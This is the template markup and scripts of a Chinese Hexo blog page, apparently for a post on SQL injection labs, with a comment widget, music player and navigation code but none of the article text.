    <div id="vcomments" class="vcomments"></div>
    
  </div>
  <div class="article-catelogue">
    <div class="article-catelogue--wrapper">
      <div class="catelogue catelogue-1">
        <h3>目录</h3>
        
      </div>
      
        <div class="catelogue catelogue-2">
          
            <p>
              <span>上一篇：</span>
              <a href="/2024/01/05/MySQL控制网站/">MySQL控制网站</a>
            </p>
           
          
            <p>
              <span>下一篇</span>
              <a href="/2023/12/24/Yakit和Burp/">Yakit和Burp</a>
            </p>
          
        </div>
      
    </div>
  </div>
</div>


<script>
  // var定义，避免pjax重新进来造成的重复声明错误
  var config = JSON.parse('{"enable":true,"appId":"Pf8zCXGEH1qsprnWfikVVujL-gzGzoHsz","appKey":"qOqoiUHhH1TGtLRUYURkLRQX","placeholder":"请留下你宝贵的意见吧~","meta":["nick"],"recordIP":true,"visitor":true,"enableQQ":true}')
  new Valine({
    el: '#vcomments',
    appId: config.appId,
    appKey: config.appKey,
    placeholder: config.placeholder,
    meta: config.meta,
    recordIP: config.recordIP,
    visitor: config.visitor,
    enableQQ: config.enableQQ,
    path: '2024/01/01/sqli-less/'
  })
</script>


<script>
  $(document).on('pjax:complete', function() {
    const tocs = document.querySelector('.toc')
    const links = tocs ? tocs.querySelectorAll('a') : []
    links.forEach(link => {
      link.addEventListener('click', e => {
        const href = decodeURIComponent(e.href)
        href.search(/#(.*)/)
        const id = RegExp.$1
        const target = document.querySelector('#' + id)
        const top = target.offsetTop
        document.documentElement.scrollTo({
          top: top - 100,
          behavior: 'smooth'
        })
        e.preventDefault()
      })
    })
  })
</script> 

</div>
      <div class="main-right-wrapper"><div class="main-right">
  <div class="main-right--board">
    <div class="main-right--title">
      <h5>公告栏</h5>
      <i class="iconfont icon-gonggao"></i>
    </div>
    <div class="main-right--content">
      Hello 
    </div>
  </div>

  <div id="aplayer" class="main-right--music"></div>

  <div class="operate-items">
    <div class="operate-item backtop">
      <i class="iconfont icon-huidaodingbu"></i>
      <span>回到顶部</span>
    </div>
    
    <div class="operate-item turn-comment hidden">
      <i class="iconfont icon-pinglun"></i>
      <span>查看评论</span>
    </div>
    
  </div>

  <div class="main-right--site">
    <div class="main-right--power">
      <p>Power By <a target="_blank" rel="noopener" href="https://hexo.io/zh-cn/docs/">Hexo</a>.</p>
      <p>Theme：<a target="_blank" rel="noopener" href="https://github.com/Aizener/hexo-theme-cola">Cola.</a></p>
    </div>
    <p class="main-right--refer"><a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/#/Integrated/index">蜀ICP备2022005384号-1</a> </p>
  </div>
</div>

<script>
  function setOperateItem () {
    const reg = /\d{4}\/\d{2}\/\d{2}\/.+/
    const path = location.pathname
    const operateDom = document.querySelector('.main-right .operate-items')
    const commentDom = document.querySelector('.turn-comment')
    const cateloguDom = document.querySelector('.article-catelogue > .article-catelogue--wrapper');

    if (commentDom) {
      if (reg.test(path) || path.match(/\/log\/.+/)) {
        commentDom.classList.remove('hidden')
        const newDom = operateDom.cloneNode(true);
        const _backtopDom = newDom.querySelector('.backtop');
        const _commentDom = newDom.querySelector('.turn-comment');
        _backtopDom.addEventListener('click', () => backTopEvent());
        _commentDom.addEventListener('click', () => commentDomEvent());
        cateloguDom.appendChild(newDom);
      } else {
        commentDom.classList.add('hidden')
      }
    }
  }

  setOperateItem()
  const musics = JSON.parse(`[{"name":"安河桥","artist":"宋冬野","url":"http://ting6.yymp3.net:82/new25/songdongye/11.mp3","cover":"https://img2.baidu.com/it/u=1260056724,1076343118&fm=253&fmt=auto&app=138&f=JPEG?w=500&h=500"},{"name":"卡布达","artist":"暂无","url":"/music/kabuda.mp3","cover":"https://img2.baidu.com/it/u=705831265,2862720033&fm=253&fmt=auto&app=138&f=JPEG?w=500&h=500"}]`)
  const ap = new APlayer({
    container: document.querySelector('#aplayer'),
    audio: musics,
  })

  $(document).on('pjax:complete', function() {
    setOperateItem()
  })

  document.querySelector('.backtop').addEventListener('click', () => {
    backTopEvent();
  })
  const dom = document.querySelector('.turn-comment')
  dom && dom.addEventListener('click', () => {
    commentDomEvent();
  })

  function backTopEvent() {
    document.documentElement.scrollTo({
      top: 0,
      behavior: 'smooth'
    })
  }

  function commentDomEvent() {
    const commentDom = document.querySelector('.comments-intro')
    if (!commentDom) return
    const top = commentDom.offsetTop, height = commentDom.offsetHeight
    document.documentElement.scrollTo({
      top: top - 2 * height,
      behavior: 'smooth'
    })
  }
</script></div>
    </section>
  </div>
  <div id="progress" class="progress"></div>
  <div id="gray" class="gray"></div>

  <script>
    function initScroll () {
      document.addEventListener('scroll', () => {
        const doc = document.documentElement
        const scrollTop = doc.scrollTop
        const pageHeight = doc.offsetHeight
        const clientHeight = doc.clientHeight
        const ratio = scrollTop / (pageHeight - clientHeight)
        const progress = document.querySelector('#progress')
        const avatarImg = document.querySelector('.main-left--avatar')
        progress.style.width = (100 * ratio) + '%'
        avatarImg.style.transform = `rotate(${360 * ratio}deg)`
      })
    }

    const rootPath = "/"

    const checkAndSetArticlePageLayout = () => {
      const path = location.pathname.replace(rootPath, '');
      if (
        /^\/?\d{4}\/\d{2}\/\d{2}\/.*/.test(path) ||
        /^log\/.+/.test(path)
      ) {
        $('.main-container, .main-right, .main-right-wrapper').addClass('is-article')
      } else {
        $('.main-container, .main-right, .main-right-wrapper').removeClass('is-article')
      }
    }

    const gray = "none"
    const setGrayStyle = () => {
      if (gray === 'none') {
        return
      } else if (gray === 'index') {
        location.pathname === '/' ? $('#gray').show() : $('#gray').hide()
      } else if (gray === 'all') {
        $('#gray').show()
      }
    }
    setGrayStyle()


    window.onload = function () {
      checkAndSetArticlePageLayout()
      setTimeout(() => {
        $('#load').slideUp()
        $('#container').slideToggle()
        setTimeout(() => {
          initScroll();
        }, 500)
      }, 500)
    }
    
    let status = 0
    // 对所有链接跳转事件绑定pjax容器container
    $(document).pjax('a[target!=_blank]', '#main-container', {
      container: '#main-container',
      fragment: '#main-container',
      timeout: 8000
    })

    $(document).on('pjax:start', function() {
    })
    $(document).on('pjax:complete', function() {
      status = 0
      $('.main-container').addClass('to-up').on('animationend', function() {
        $(this).removeClass('to-up')
      })
      setGrayStyle()
      checkAndSetArticlePageLayout()
    })
    $(document).on('pjax:popstate', function() {
      status = -1
      checkAndSetArticlePageLayout()
    });
  </script>
</body>
</html>